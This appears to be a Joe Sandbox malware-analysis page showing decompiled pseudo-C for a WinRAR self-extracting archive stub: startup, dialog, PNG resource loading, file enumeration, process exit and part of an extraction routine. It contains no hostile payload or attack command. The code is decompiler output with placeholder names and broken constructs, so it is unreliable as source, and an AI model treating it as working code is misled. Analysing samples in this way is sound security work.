			E0007D5D4(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a84, void* _a86, void* _a90, void* _a92, void* _a94, void* _a96, void* _a98, void* _a100, void* _a104, void* _a144, void* _a148, void* _a196) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				void* _t42;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t94;
				struct HINSTANCE__* _t95;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t121;

				_t121 = __fp0;
				_t99 = __ebp;
				_t88 = __edx;
				E000700CF(__edx, 1);
				E00079DA4("C:\Users\hardz\Desktop", 0x800);
				E0007A335( &_v208); // executed
				E000713B3(0xa81e0);
				_t74 = 0;
				E0007F350(0x7104, 0xb6b80, 0, 0x7104);
				_t102 = _t101 + 0xc;
				_t94 = GetCommandLineW();
				_t106 = _t94;
				if(_t94 != 0) {
					_push(_t94);
					E0007BC84(0, _t106);
					if( *0xaa471 == 0) {
						E0007D287(__eflags, _t94); // executed
					} else {
						_push(__ebp);
						_t100 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t100 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t100);
						_pop(_t99);
					}
				}
				GetModuleFileNameW(_t74, 0xbdc90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xbdc90); // executed
				GetLocalTime(_t102 + 0xc);
				_push( *(_t102 + 0x1a) & 0x0000ffff);
				_push( *(_t102 + 0x1c) & 0x0000ffff);
				_push( *(_t102 + 0x1e) & 0x0000ffff);
				_push( *(_t102 + 0x20) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				E0006400A(_t102 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t102 + 0x24) & 0x0000ffff);
				_t103 = _t102 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t103 + 0x7c);
				_t95 = GetModuleHandleW(_t74);
				 *0xa0ed4 = _t95;
				 *0xa0ed0 = _t95; // executed
				_t41 = LoadIconW(_t95, 0x64); // executed
				 *0xac574 = _t41; // executed
				_t42 = E0007ADED(0xa81e0, _t88, _t121); // executed
				 *0xb6b7c = _t42;
				E0006D31C(0xa0ee8, _t88, _t99, 0xbdc90);
				E00078835(0);
				E00078835(0);
				 *0xa8440 = _t103 + 0x5c;
				 *0xa8444 = _t103 + 0x30; // executed
				DialogBoxParamW(_t95, L"STARTDLG", _t74, E0007AEE0, _t74); // executed
				 *0xa8444 = _t74;
				 *0xa8440 = _t74;
				E000788F3(_t103 + 0x24);
				E000788F3(_t103 + 0x50);
				_t51 =  *0xbeca0;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0xa9468 != 0) {
					E0007A544(0xbdc90);
				}
				E0006EB27(0xb6a78);
				if( *0xa843c > 0) {
					L000835CE( *0xa8438);
				}
				DeleteObject( *0xac574);
				_t54 =  *0xb6b7c;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0xa0f50 == 0 &&  *0xa8450 != 0) {
					E00066FC6(0xa0f50, 0xff);
				}
				_t55 =  *0xbeca4;
				 *0xa8450 = 1;
				if( *0xbeca4 != 0) {
					E0007D2E6(_t55);
					CloseHandle( *0xbeca4);
				}
				_t96 =  *0xa0f50; // 0x0
				if( *0xbec99 != 0) {
					_t58 =  *0x9e5fc; // 0x3e8
					if( *0xbec9a == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t96 = _t96 - _t58;
							__eflags = _t96;
						}
					} else {
						_t96 =  *0xbec9c;
						if(_t58 > 0) {
							_t96 = _t96 + _t58;
						}
					}
				}
				E0007A39D(_t103 + 0x1c); // executed
				return _t96;
			}

0x0007d5d4
0x0007d5d4
0x0007d5d4
0x0007d5df
0x0007d5ee
0x0007d5f7
0x0007d601
0x0007d60b
0x0007d614
0x0007d619
0x0007d622
0x0007d624
0x0007d626
0x0007d628
0x0007d629
0x0007d634
0x0007d6a1
0x0007d636
0x0007d636
0x0007d649
0x0007d64d
0x0007d68e
0x0007d694
0x0007d694
0x0007d697
0x0007d69d
0x0007d69d
0x0007d634
0x0007d6b2
0x0007d6be
0x0007d6c9
0x0007d6d4
0x0007d6da
0x0007d6e0
0x0007d6e6
0x0007d6ec
0x0007d6f2
0x0007d708
0x0007d70d
0x0007d71a
0x0007d727
0x0007d72c
0x0007d732
0x0007d738
0x0007d73e
0x0007d743
0x0007d74e
0x0007d753
0x0007d75c
0x0007d765
0x0007d775
0x0007d784
0x0007d789
0x0007d793
0x0007d799
0x0007d79f
0x0007d7a8
0x0007d7ad
0x0007d7b4
0x0007d7b7
0x0007d7b7
0x0007d7c4
0x0007d7c6
0x0007d7c6
0x0007d7d0
0x0007d7dc
0x0007d7e4
0x0007d7e9
0x0007d7f0
0x0007d7f6
0x0007d7fd
0x0007d800
0x0007d800
0x0007d80d
0x0007d822
0x0007d822
0x0007d827
0x0007d82c
0x0007d835
0x0007d838
0x0007d843
0x0007d843
0x0007d850
0x0007d856
0x0007d85f
0x0007d864
0x0007d874
0x0007d876
0x0007d878
0x0007d878
0x0007d878
0x0007d866
0x0007d866
0x0007d86e
0x0007d870
0x0007d870
0x0007d86e
0x0007d864
0x0007d87e
0x0007d88e

APIs

Part of subcall function 000700CF: GetModuleHandleW.KERNEL32(kernel32), ref: 000700E4
Part of subcall function 000700CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000700F6
Part of subcall function 000700CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00070127

Part of subcall function 00079DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00079DAC

Part of subcall function 0007A335: OleInitialize.OLE32(00000000), ref: 0007A34E
Part of subcall function 0007A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0007A385
Part of subcall function 0007A335: SHGetMalloc.SHELL32(000A8430), ref: 0007A38F

Part of subcall function 000713B3: GetCPInfo.KERNEL32(00000000,?), ref: 000713C4
Part of subcall function 000713B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 000713D8

GetCommandLineW.KERNEL32 ref: 0007D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0007D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0007D654
UnmapViewOfFile.KERNEL32(00000000), ref: 0007D68E

Part of subcall function 0007D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0007D29D
Part of subcall function 0007D287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0007D2D9

CloseHandle.KERNEL32(00000000), ref: 0007D697
GetModuleFileNameW.KERNEL32(00000000,000BDC90,00000800), ref: 0007D6B2
SetEnvironmentVariableW.KERNELBASE(sfxname,000BDC90), ref: 0007D6BE
GetLocalTime.KERNEL32(?), ref: 0007D6C9
_swprintf.LIBCMT ref: 0007D708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0007D71A
GetModuleHandleW.KERNEL32(00000000), ref: 0007D721
LoadIconW.USER32(00000000,00000064), ref: 0007D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0007D789
Sleep.KERNEL32(?), ref: 0007D7B7
DeleteObject.GDI32 ref: 0007D7F0
DeleteObject.GDI32(?), ref: 0007D800
CloseHandle.KERNEL32 ref: 0007D843

Strings

STARTDLG, xrefs: 0007D77E
sfxname, xrefs: 0007D6B9
winrarsfxmappingfile.tmp, xrefs: 0007D637
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0007D6F9
C:\Users\user\Desktop, xrefs: 0007D5E9
sfxstime, xrefs: 0007D715

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-586660713
Opcode ID: 41100fac473c515974679b6ff7daeb082fe223e43ac0341ab07b477ed7719507
Instruction ID: 9349d56b2b150e239ebea96d63b441b4296b64fde71148cfa99caed31c1eb976
Opcode Fuzzy Hash: 41100fac473c515974679b6ff7daeb082fe223e43ac0341ab07b477ed7719507
Instruction Fuzzy Hash: F761B571D04241AFE360ABA5DC49FAA3BE8BF85740F00842AF54996162DF7C9D44CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00079E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00079E1C(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				char _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				long _t44;
				intOrPtr* _t46;
				struct HRSRC__* _t47;

				_t14 = FindResourceW( *0xa0ed0, _a4, "PNG");
				_t47 = _t14;
				if(_t47 == 0) {
					return _t14;
				}
				_t44 = SizeofResource( *0xa0ed0, _t47);
				if(_t44 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xa0ed0, _t47);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t48 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t44); // executed
					_t35 = _t19;
					if(_t35 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t35) == 0) {
						L14:
						GlobalFree(_t35);
						goto L15;
					}
					E0007F4B0(_t20, _t48, _t44);
					_v8 = 0;
					_push( &_v8);
					_push(0);
					_push(_t35);
					if( *0xc2178() == 0) {
						_t26 = E00079D7B(_t24, _t37, _v20, 0); // executed
						_t38 = _v28;
						_t46 = _t26;
						 *0x93260(_t38);
						 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
						if(_t46 != 0) {
							 *((intOrPtr*)(_t46 + 8)) = 0;
							if( *((intOrPtr*)(_t46 + 8)) == 0) {
								_push(0xffffff);
								_t33 =  &_v20;
								_push(_t33);
								_push( *((intOrPtr*)(_t46 + 4)));
								L0007E238(); // executed
								if(_t33 != 0) {
									 *((intOrPtr*)(_t46 + 8)) = _t33;
								}
							}
							 *0x93260(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t46))))();
						}
					}
					GlobalUnlock(_t35);
					goto L14;
				}
				goto L4;
			}

0x00079e2e
0x00079e34
0x00079e38
0x00079f32
0x00079f32
0x00079e4c
0x00079e50
0x00079e70
0x00079e70
0x00079f2e
0x00000000
0x00079f2e
0x00079e59
0x00079e61
0x00000000
0x00000000
0x00079e64
0x00079e6a
0x00079e6e
0x00079e7e
0x00079e82
0x00079e88
0x00079e8c
0x00079f28
0x00079f28
0x00000000
0x00079f2d
0x00079e9b
0x00079f21
0x00079f22
0x00000000
0x00079f22
0x00079ea4
0x00079eac
0x00079eb4
0x00079eb5
0x00079eb6
0x00079ebf
0x00079ec6
0x00079ecb
0x00079ecf
0x00079ed9
0x00079edf
0x00079ee3
0x00079ee8
0x00079eed
0x00079eef
0x00079ef4
0x00079ef8
0x00079ef9
0x00079efc
0x00079f03
0x00079f05
0x00079f05
0x00079f03
0x00079f10
0x00079f18
0x00079f18
0x00079ee3
0x00079f1b
0x00000000
0x00079f1b
0x00000000

APIs

FindResourceW.KERNEL32(0007AE4D,PNG,?,?,?,0007AE4D,00000066), ref: 00079E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0007AE4D,00000066), ref: 00079E46
LoadResource.KERNEL32(00000000,?,?,?,0007AE4D,00000066), ref: 00079E59
LockResource.KERNEL32(00000000,?,?,?,0007AE4D,00000066), ref: 00079E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0007AE4D,00000066), ref: 00079E82
GlobalLock.KERNEL32 ref: 00079E93
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00079EFC
GlobalUnlock.KERNEL32(00000000), ref: 00079F1B
GlobalFree.KERNEL32 ref: 00079F22

Strings

PNG, xrefs: 00079E1F

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: 7c74eb3cb276f63c64ecfac1ef8ccc3b8d37ad249a7ba66191f630c2ca65a2c4
Instruction ID: 50c54aec9bee10ebde20ab9918ffdee45424ed59506a48c7311db3625289a001
Opcode Fuzzy Hash: 7c74eb3cb276f63c64ecfac1ef8ccc3b8d37ad249a7ba66191f630c2ca65a2c4
Instruction Fuzzy Hash: C931A271A04706AFE7109F61DC48E2BBBEDFF89751B04852AF90AD2261DB39DC00DE65

Uniqueness

Uniqueness Score: -1.00%

Function 0006A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0006A5F4(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				signed int _t74;
				void* _t75;
				void* _t81;
				intOrPtr _t83;
				void* _t86;

				_t81 = __edx;
				E0007E360();
				_push(_t74);
				_t86 = _a4692;
				_t83 = _a4700;
				_t75 = _t74 | 0xffffffff;
				_push( &_v0);
				if(_t86 != _t75) {
					_t43 = FindNextFileW(_t86, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t86 = _t75;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t83 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t86 - _t75;
					if(_t86 != _t75) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t86 = _t65;
					if(_t86 != _t75) {
						L13:
						E0006FE56(_t83, _a4696, 0x800);
						_push(0x800);
						E0006BCFB(__eflags, _t83,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t83 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t83 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t83 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t83 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t83 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t83 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t83 + 0x1038)) = _v4;
						 *(_t83 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t83 + 0x1004)) = _a4;
						E00070E19(_t83 + 0x1010, _t81,  &_v4);
						E00070E19(_t83 + 0x1018, _t81,  &_v24);
						E00070E19(_t83 + 0x1020, _t81,  &_v20);
					} else {
						if(E0006B66C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t83 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t86 = _t73;
							if(_t86 != _t75) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t83 + 0x1040) =  *(_t83 + 0x1040) & 0x00000000;
				return _t86;
			}

0x0006a5f4
0x0006a5f9
0x0006a5fe
0x0006a601
0x0006a60d
0x0006a614
0x0006a61c
0x0006a61f
0x0006a692
0x0006a698
0x0006a69a
0x0006a69c
0x0006a69e
0x0006a6a4
0x0006a6a7
0x0006a6a7
0x0006a6aa
0x0006a6aa
0x0006a6b0
0x0006a6b2
0x00000000
0x00000000
0x0006a621
0x0006a628
0x0006a62e
0x0006a632
0x0006a6b8
0x0006a6c1
0x0006a6c6
0x0006a6cd
0x0006a6d8
0x0006a6d8
0x0006a6dc
0x0006a6e6
0x0006a6e9
0x0006a6f3
0x0006a6fd
0x0006a707
0x0006a711
0x0006a71b
0x0006a725
0x0006a72f
0x0006a73c
0x0006a74c
0x0006a75c
0x0006a638
0x0006a64f
0x0006a66a
0x0006a66a
0x0006a673
0x0006a684
0x0006a684
0x0006a67f
0x0006a681
0x0006a681
0x0006a686
0x0006a651
0x0006a65e
0x0006a664
0x0006a668
0x00000000
0x00000000
0x00000000
0x00000000
0x0006a668
0x0006a64f
0x0006a632
0x0006a761
0x0006a774

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0006A4EF,000000FF,?,?), ref: 0006A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0006A4EF,000000FF,?,?), ref: 0006A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0006A4EF,000000FF,?,?), ref: 0006A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0006A4EF,000000FF,?,?), ref: 0006A692
GetLastError.KERNEL32(?,?,?,?,0006A4EF,000000FF,?,?), ref: 0006A69E

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 4e84e93a48de4a2a87d7d743e4405af431c208809991b18492f4b370aff522c7
Instruction ID: eee9fd23fedb1e9759a199885090c4d415ed89b351a3646dd2774e712ae150b3
Opcode Fuzzy Hash: 4e84e93a48de4a2a87d7d743e4405af431c208809991b18492f4b370aff522c7
Instruction Fuzzy Hash: 85419671604245AFC324EF68C884ADBF7E9BF89344F044A2AF599D3201D778A9648F62

Uniqueness

Uniqueness Score: -1.00%

Function 0008753D Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0008753D(int _a4) {
				void* _t14;
				void* _t16;

				if(E0008A836(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E000875C2(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x00087549
0x00087565
0x00087565
0x0008756e
0x00087577

APIs

GetCurrentProcess.KERNEL32(00000000,?,00087513,00000000,0009BAD8,0000000C,0008766A,00000000,00000002,00000000), ref: 0008755E
TerminateProcess.KERNEL32(00000000,?,00087513,00000000,0009BAD8,0000000C,0008766A,00000000,00000002,00000000), ref: 00087565
ExitProcess.KERNEL32 ref: 00087577

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 52c502cf68dbcc18a56a59e759ae881b656e8c41038f989170945884480ed425
Instruction ID: 34acdb4e7e39a5971e6bdc69db64f20143a5a0dd9f214b539b86b69d5d1a4a28
Opcode Fuzzy Hash: 52c502cf68dbcc18a56a59e759ae881b656e8c41038f989170945884480ed425
Instruction Fuzzy Hash: 6FE04631000A08ABDF11BF24CD08A893B69FB90741F208015F8898A232CB79DE42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0006857B Relevance: 3.9, APIs: 2, Instructions: 947
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E0006857B(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t371;
				signed int _t375;
				signed int _t376;
				signed int _t381;
				signed int _t387;
				void* _t389;
				signed int _t390;
				signed int _t394;
				signed int _t395;
				signed int _t400;
				signed int _t405;
				signed int _t406;
				signed int _t410;
				signed int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t425;
				signed int _t434;
				char _t436;
				char _t438;
				signed int _t439;
				signed int _t440;
				signed int _t463;
				signed int _t472;
				intOrPtr _t475;
				char _t482;
				signed int _t483;
				void* _t494;
				void* _t502;
				void* _t504;
				signed int _t514;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t523;
				signed int _t526;
				signed int _t534;
				signed int _t544;
				signed int _t546;
				signed int _t548;
				signed int _t550;
				signed char _t551;
				signed int _t554;
				void* _t559;
				signed int _t567;
				intOrPtr* _t578;
				intOrPtr _t580;
				signed int _t581;
				signed int _t591;
				intOrPtr _t594;
				signed int _t597;
				signed int _t606;
				signed int _t613;
				signed int _t615;
				signed int _t616;
				signed int _t619;
				signed int _t637;
				signed int _t638;
				void* _t645;
				void* _t646;
				signed int _t662;
				signed int _t673;
				intOrPtr _t674;
				void* _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t687;
				intOrPtr _t689;
				signed int _t694;
				intOrPtr _t696;
				signed int _t699;
				signed int _t704;
				void* _t708;
				void* _t710;
				void* _t712;

				_t580 = __ecx;
				E0007E28C(E00091E4A, _t708);
				E0007E360();
				_t578 =  *((intOrPtr*)(_t708 + 8));
				_t672 = 0;
				_t689 = _t580;
				 *((intOrPtr*)(_t708 - 0x20)) = _t689;
				_t371 =  *( *(_t689 + 8) + 0x82fa) & 0x0000ffff;
				 *(_t708 - 0x18) = _t371;
				if( *((intOrPtr*)(_t708 + 0xc)) != 0) {
					L6:
					_t696 =  *((intOrPtr*)(_t578 + 0x21dc));
					__eflags = _t696 - 2;
					if(_t696 == 2) {
						 *(_t689 + 0x10f7) = _t672;
						__eflags =  *(_t578 + 0x32dc) - _t672;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t578 + 0x32e4) - _t672;
							if(__eflags > 0) {
								L26:
								_t581 =  *(_t689 + 8);
								__eflags =  *((intOrPtr*)(_t581 + 0x6160)) - _t672;
								if( *((intOrPtr*)(_t581 + 0x6160)) != _t672) {
									L29:
									 *(_t708 - 0x13) = _t672;
									_t35 = _t708 - 0x51ac; // -18860
									_t36 = _t708 - 0x13; // 0x7ed
									_t375 = E00065E3A(_t578 + 0x2280, _t36, 6, _t672, _t35, 0x800);
									__eflags = _t375;
									_t376 = _t375 & 0xffffff00 | _t375 != 0x00000000;
									 *(_t708 - 0x12) = _t376;
									__eflags = _t376;
									if(_t376 != 0) {
										__eflags =  *(_t708 - 0x13);
										if( *(_t708 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t689 + 0xf1)) = 0;
										}
									}
									E00062071(_t578);
									_push(0x800);
									_t43 = _t708 - 0x113c; // -2364
									_push(_t578 + 0x22a8);
									E0006B2E3();
									__eflags =  *((char*)(_t578 + 0x3373));
									 *(_t708 - 0x1c) = 1;
									if( *((char*)(_t578 + 0x3373)) == 0) {
										_t381 = E0006215B(_t578);
										__eflags = _t381;
										if(_t381 == 0) {
											_t551 =  *(_t689 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t551 + 0x72c4));
											asm("sbb al, al");
											_t61 = _t708 - 0x12;
											 *_t61 =  *(_t708 - 0x12) &  !_t551;
											__eflags =  *_t61;
										}
									} else {
										_t554 =  *( *(_t689 + 8) + 0x72c4);
										__eflags = _t554 - 1;
										if(_t554 != 1) {
											__eflags =  *(_t708 - 0x13);
											if( *(_t708 - 0x13) == 0) {
												__eflags = _t554;
												 *(_t708 - 0x12) =  *(_t708 - 0x12) & (_t554 & 0xffffff00 | _t554 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t708 - 0x113c; // -2364
												_t559 = E0006BC34(_t54);
												_t662 =  *(_t689 + 8);
												__eflags =  *((intOrPtr*)(_t662 + 0x72c4)) - 1 - _t559;
												if( *((intOrPtr*)(_t662 + 0x72c4)) - 1 != _t559) {
													 *(_t708 - 0x12) = 0;
												} else {
													_t57 = _t708 - 0x113c; // -2364
													_push(1);
													E0006BC34(_t57);
												}
											}
										}
									}
									 *((char*)(_t689 + 0x5f)) =  *((intOrPtr*)(_t578 + 0x3319));
									 *((char*)(_t689 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *0x93260( *((intOrPtr*)(_t578 + 0x6ca8)) -  *(_t578 + 0x32d8),  *((intOrPtr*)(_t578 + 0x6cac)), 0);
									 *((intOrPtr*)( *_t578 + 0x10))();
									_t673 = 0;
									_t387 = 0;
									 *(_t708 - 0xe) = 0;
									 *(_t708 - 0x24) = 0;
									__eflags =  *(_t708 - 0x12);
									if( *(_t708 - 0x12) != 0) {
										L43:
										_t699 =  *(_t708 - 0x18);
										_t591 =  *((intOrPtr*)( *(_t689 + 8) + 0x6201));
										_t389 = 0x49;
										__eflags = _t591;
										if(_t591 == 0) {
											L45:
											_t390 = _t673;
											L46:
											__eflags = _t591;
											_t83 = _t708 - 0x113c; // -2364
											_t394 = L00071375(_t591, _t83, (_t390 & 0xffffff00 | _t591 == 0x00000000) & 0x000000ff, _t390,  *(_t708 - 0x24)); // executed
											__eflags = _t394;
											if(__eflags == 0) {
												L219:
												_t395 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
												return _t395;
											}
											_push(0x800);
											 *((intOrPtr*)(_t708 - 0x38)) = _t689 + 0x10f8;
											_t86 = _t708 - 0x113c; // -2364
											E0006826A(__eflags, _t578, _t86, _t689 + 0x10f8);
											__eflags =  *(_t708 - 0xe);
											if( *(_t708 - 0xe) != 0) {
												L50:
												 *(_t708 - 0xd) = 0;
												L51:
												_t400 =  *(_t689 + 8);
												_t594 = 0x45;
												__eflags =  *((char*)(_t400 + 0x6157));
												_t674 = 0x58;
												 *((intOrPtr*)(_t708 - 0x34)) = _t594;
												 *((intOrPtr*)(_t708 - 0x30)) = _t674;
												if( *((char*)(_t400 + 0x6157)) != 0) {
													L53:
													__eflags = _t699 - _t594;
													if(_t699 == _t594) {
														L55:
														_t97 = _t708 - 0x31ac; // -10668
														E000670BF(_t97);
														_push(0);
														_t98 = _t708 - 0x31ac; // -10668
														_t405 = E0006A4C6(_t97, _t674, __eflags, _t689 + 0x10f8, _t98);
														__eflags = _t405;
														if(_t405 == 0) {
